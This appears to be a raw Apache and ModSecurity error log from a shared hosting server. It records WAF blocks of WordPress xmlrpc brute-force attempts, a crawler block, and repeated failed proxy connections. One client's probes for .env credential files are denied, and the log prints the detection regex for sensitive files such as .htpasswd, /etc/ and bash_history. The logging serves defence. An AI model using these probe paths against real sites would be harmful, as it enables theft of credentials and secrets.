[Tue May 26 14:29:15.304944 2026] [security2:error] [pid 606909:tid 607112] [client 199.45.155.65:41948] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.marchedesedhiou.com.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVg410yRtX9qA7aVUVv0gAAAM4"]
[Tue May 26 14:29:16.052909 2026] [security2:error] [pid 610693:tid 610905] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg4zvNO3hpmlY6M8RqpAAAAFI"]
[Tue May 26 14:29:16.383447 2026] [security2:error] [pid 610693:tid 610858] [client 202.141.83.254:53986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg5DvNO3hpmlY6M8RqrgAAACM"]
[Tue May 26 14:29:16.383579 2026] [security2:error] [pid 610693:tid 610858] [client 202.141.83.254:53986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg5DvNO3hpmlY6M8RqrgAAACM"]
[Tue May 26 14:29:17.252695 2026] [proxy:error] [pid 606909:tid 607039] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:17.252798 2026] [proxy_http:error] [pid 606909:tid 607039] [client 208.84.100.165:38322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:17.253391 2026] [proxy:error] [pid 606909:tid 607039] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:17.253424 2026] [proxy_http:error] [pid 606909:tid 607039] [client 208.84.100.165:38322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:17.620207 2026] [security2:error] [pid 610693:tid 610883] [client 36.255.18.88:27277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.18.255.36.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/xmlrpc.php"] [unique_id "ahVg5TvNO3hpmlY6M8RqvQAAADw"]
[Tue May 26 14:29:17.620374 2026] [security2:error] [pid 610693:tid 610883] [client 36.255.18.88:27277] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "hassina-foundation.com"] [uri "/xmlrpc.php"] [unique_id "ahVg5TvNO3hpmlY6M8RqvQAAADw"]
[Tue May 26 14:29:18.187441 2026] [security2:error] [pid 610693:tid 610896] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg5TvNO3hpmlY6M8RqwAAAAEk"]
[Tue May 26 14:29:18.575390 2026] [security2:error] [pid 606909:tid 607149] [client 154.161.32.97:56475] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVg5V0yRtX9qA7aVUVv_QAAAPM"]
[Tue May 26 14:29:20.150117 2026] [security2:error] [pid 610693:tid 610836] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg5zvNO3hpmlY6M8Rq3AAAAA0"]
[Tue May 26 14:29:20.541392 2026] [security2:error] [pid 610693:tid 610871] [client 114.119.133.194:62539] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVg6DvNO3hpmlY6M8Rq6AAAADA"], referer: http://haddingtonwines.com/cart?remove_item=f8151fdd6026f82036ab63052b97505b
[Tue May 26 14:29:20.699427 2026] [security2:error] [pid 610693:tid 610857] [client 37.104.177.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg6DvNO3hpmlY6M8Rq5wAAACI"]
[Tue May 26 14:29:21.757602 2026] [autoindex:error] [pid 610693:tid 610936] [client 66.132.172.135:3738] AH01276: Cannot serve directory /home2/azurm42s/clicshopping.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:29:21.949749 2026] [proxy:error] [pid 610693:tid 610887] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.949813 2026] [proxy_http:error] [pid 610693:tid 610887] [client 208.84.100.165:38504] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.950037 2026] [proxy:error] [pid 610693:tid 610915] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.950076 2026] [proxy_http:error] [pid 610693:tid 610915] [client 208.84.100.165:38590] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.950227 2026] [proxy:error] [pid 610693:tid 610948] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.950302 2026] [proxy_http:error] [pid 610693:tid 610948] [client 208.84.100.165:38558] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.952455 2026] [security2:error] [pid 610693:tid 610941] [client 208.84.100.165:38384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVg6TvNO3hpmlY6M8RrDAAAAHY"]
[Tue May 26 14:29:21.954659 2026] [proxy:error] [pid 610693:tid 610890] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.954721 2026] [proxy_http:error] [pid 610693:tid 610890] [client 208.84.100.165:38594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.954813 2026] [proxy:error] [pid 610693:tid 610892] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.954853 2026] [proxy_http:error] [pid 610693:tid 610892] [client 208.84.100.165:38610] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.954965 2026] [proxy:error] [pid 610693:tid 610830] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.955016 2026] [proxy_http:error] [pid 610693:tid 610830] [client 208.84.100.165:38488] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.955281 2026] [proxy:error] [pid 610693:tid 610914] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.955350 2026] [proxy_http:error] [pid 610693:tid 610914] [client 208.84.100.165:38572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.955440 2026] [proxy:error] [pid 610693:tid 610915] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.955476 2026] [proxy_http:error] [pid 610693:tid 610915] [client 208.84.100.165:38590] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.955597 2026] [proxy:error] [pid 610693:tid 610948] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.955671 2026] [proxy_http:error] [pid 610693:tid 610948] [client 208.84.100.165:38558] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.955774 2026] [proxy:error] [pid 610693:tid 610887] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.955812 2026] [proxy_http:error] [pid 610693:tid 610887] [client 208.84.100.165:38504] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.955997 2026] [proxy:error] [pid 610693:tid 610896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.956029 2026] [proxy_http:error] [pid 610693:tid 610896] [client 208.84.100.165:38536] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.956128 2026] [proxy:error] [pid 610693:tid 610914] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.956165 2026] [proxy_http:error] [pid 610693:tid 610914] [client 208.84.100.165:38572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.956314 2026] [proxy:error] [pid 610693:tid 610919] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.956366 2026] [proxy_http:error] [pid 610693:tid 610919] [client 208.84.100.165:38518] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.956436 2026] [proxy:error] [pid 610693:tid 610946] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.956466 2026] [proxy_http:error] [pid 610693:tid 610946] [client 208.84.100.165:38484] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.956837 2026] [proxy:error] [pid 610693:tid 610929] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.956879 2026] [proxy_http:error] [pid 610693:tid 610929] [client 208.84.100.165:38348] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.956969 2026] [proxy:error] [pid 610693:tid 610838] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.957008 2026] [proxy_http:error] [pid 610693:tid 610838] [client 208.84.100.165:38466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.957032 2026] [security2:error] [pid 610693:tid 610824] [client 208.84.100.165:38340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVg6TvNO3hpmlY6M8RrEQAAAAE"]
[Tue May 26 14:29:21.957188 2026] [proxy:error] [pid 610693:tid 610896] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.957219 2026] [proxy_http:error] [pid 610693:tid 610896] [client 208.84.100.165:38536] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.957239 2026] [security2:error] [pid 610693:tid 610916] [client 208.84.100.165:38372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVg6TvNO3hpmlY6M8RrFAAAAF0"]
[Tue May 26 14:29:21.957328 2026] [proxy:error] [pid 610693:tid 610898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.957374 2026] [proxy_http:error] [pid 610693:tid 610898] [client 208.84.100.165:38526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.957484 2026] [proxy:error] [pid 610693:tid 610866] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.957574 2026] [proxy_http:error] [pid 610693:tid 610866] [client 208.84.100.165:38470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.957692 2026] [proxy:error] [pid 610693:tid 610940] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.957730 2026] [proxy_http:error] [pid 610693:tid 610940] [client 208.84.100.165:38394] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.957884 2026] [proxy:error] [pid 610693:tid 610886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.957961 2026] [proxy_http:error] [pid 610693:tid 610886] [client 208.84.100.165:38464] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.958062 2026] [proxy:error] [pid 610693:tid 610835] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.958106 2026] [proxy_http:error] [pid 610693:tid 610835] [client 208.84.100.165:38452] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.958195 2026] [proxy:error] [pid 610693:tid 610918] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.958246 2026] [proxy_http:error] [pid 610693:tid 610918] [client 208.84.100.165:38438] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.958421 2026] [proxy:error] [pid 610693:tid 610864] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.958455 2026] [proxy_http:error] [pid 610693:tid 610864] [client 208.84.100.165:38548] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.958588 2026] [proxy:error] [pid 610693:tid 610886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.958633 2026] [proxy_http:error] [pid 610693:tid 610886] [client 208.84.100.165:38464] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.958749 2026] [proxy:error] [pid 610693:tid 610835] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.958782 2026] [proxy_http:error] [pid 610693:tid 610835] [client 208.84.100.165:38452] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.958868 2026] [proxy:error] [pid 610693:tid 610946] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.958902 2026] [proxy_http:error] [pid 610693:tid 610946] [client 208.84.100.165:38484] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.959000 2026] [proxy:error] [pid 610693:tid 610929] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.959039 2026] [proxy_http:error] [pid 610693:tid 610929] [client 208.84.100.165:38348] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.959227 2026] [proxy:error] [pid 610693:tid 610939] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.959276 2026] [proxy_http:error] [pid 610693:tid 610939] [client 208.84.100.165:38426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.959353 2026] [proxy:error] [pid 610693:tid 610838] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.959387 2026] [proxy_http:error] [pid 610693:tid 610838] [client 208.84.100.165:38466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.959645 2026] [proxy:error] [pid 610693:tid 610901] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.959704 2026] [proxy_http:error] [pid 610693:tid 610901] [client 208.84.100.165:38412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.959779 2026] [security2:error] [pid 610693:tid 610903] [client 208.84.100.165:38388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVg6TvNO3hpmlY6M8RrFwAAAFA"]
[Tue May 26 14:29:21.959815 2026] [proxy:error] [pid 610693:tid 610898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.959863 2026] [proxy_http:error] [pid 610693:tid 610898] [client 208.84.100.165:38526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.959963 2026] [proxy:error] [pid 610693:tid 610889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.960006 2026] [proxy_http:error] [pid 610693:tid 610889] [client 208.84.100.165:38588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.960094 2026] [proxy:error] [pid 610693:tid 610940] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.960129 2026] [proxy_http:error] [pid 610693:tid 610940] [client 208.84.100.165:38394] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.960199 2026] [proxy:error] [pid 610693:tid 610866] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.960250 2026] [proxy_http:error] [pid 610693:tid 610866] [client 208.84.100.165:38470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.960333 2026] [proxy:error] [pid 610693:tid 610870] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.960369 2026] [proxy_http:error] [pid 610693:tid 610870] [client 208.84.100.165:38364] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.960845 2026] [proxy:error] [pid 610693:tid 610901] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.960887 2026] [proxy_http:error] [pid 610693:tid 610901] [client 208.84.100.165:38412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.961005 2026] [proxy:error] [pid 610693:tid 610919] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.961049 2026] [proxy_http:error] [pid 610693:tid 610919] [client 208.84.100.165:38518] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.961270 2026] [proxy:error] [pid 610693:tid 610862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.961330 2026] [proxy_http:error] [pid 610693:tid 610862] [client 208.84.100.165:38444] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.961421 2026] [proxy:error] [pid 610693:tid 610939] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.961460 2026] [proxy_http:error] [pid 610693:tid 610939] [client 208.84.100.165:38426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.961551 2026] [proxy:error] [pid 610693:tid 610864] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.961605 2026] [proxy_http:error] [pid 610693:tid 610864] [client 208.84.100.165:38548] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.961837 2026] [proxy:error] [pid 610693:tid 610918] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.961879 2026] [proxy_http:error] [pid 610693:tid 610918] [client 208.84.100.165:38438] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.962056 2026] [proxy:error] [pid 610693:tid 610890] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.962094 2026] [proxy_http:error] [pid 610693:tid 610890] [client 208.84.100.165:38594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.962198 2026] [proxy:error] [pid 610693:tid 610927] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.962234 2026] [proxy_http:error] [pid 610693:tid 610927] [client 208.84.100.165:38398] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.962339 2026] [proxy:error] [pid 610693:tid 610844] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.962383 2026] [proxy_http:error] [pid 610693:tid 610844] [client 208.84.100.165:38334] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.963109 2026] [proxy:error] [pid 610693:tid 610927] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.963155 2026] [proxy_http:error] [pid 610693:tid 610927] [client 208.84.100.165:38398] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.963269 2026] [proxy:error] [pid 610693:tid 610855] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.963313 2026] [proxy_http:error] [pid 610693:tid 610855] [client 208.84.100.165:38570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.963406 2026] [proxy:error] [pid 610693:tid 610830] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.963448 2026] [proxy_http:error] [pid 610693:tid 610830] [client 208.84.100.165:38488] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.963666 2026] [proxy:error] [pid 610693:tid 610889] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.963722 2026] [proxy_http:error] [pid 610693:tid 610889] [client 208.84.100.165:38588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.963844 2026] [proxy:error] [pid 610693:tid 610892] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.963889 2026] [proxy_http:error] [pid 610693:tid 610892] [client 208.84.100.165:38610] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.964009 2026] [proxy:error] [pid 610693:tid 610862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.964052 2026] [proxy_http:error] [pid 610693:tid 610862] [client 208.84.100.165:38444] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.964238 2026] [proxy:error] [pid 610693:tid 610844] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.964289 2026] [proxy_http:error] [pid 610693:tid 610844] [client 208.84.100.165:38334] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.964386 2026] [proxy:error] [pid 610693:tid 610870] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.964434 2026] [proxy_http:error] [pid 610693:tid 610870] [client 208.84.100.165:38364] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:21.964731 2026] [proxy:error] [pid 610693:tid 610855] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:21.964773 2026] [proxy_http:error] [pid 610693:tid 610855] [client 208.84.100.165:38570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:22.025143 2026] [security2:error] [pid 606909:tid 607123] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg6V0yRtX9qA7aVUVwIAAAANk"]
[Tue May 26 14:29:23.152775 2026] [proxy:error] [pid 610693:tid 610826] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.152849 2026] [proxy_http:error] [pid 610693:tid 610826] [client 208.84.100.165:38384] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.153408 2026] [proxy:error] [pid 610693:tid 610826] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.153439 2026] [proxy_http:error] [pid 610693:tid 610826] [client 208.84.100.165:38384] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
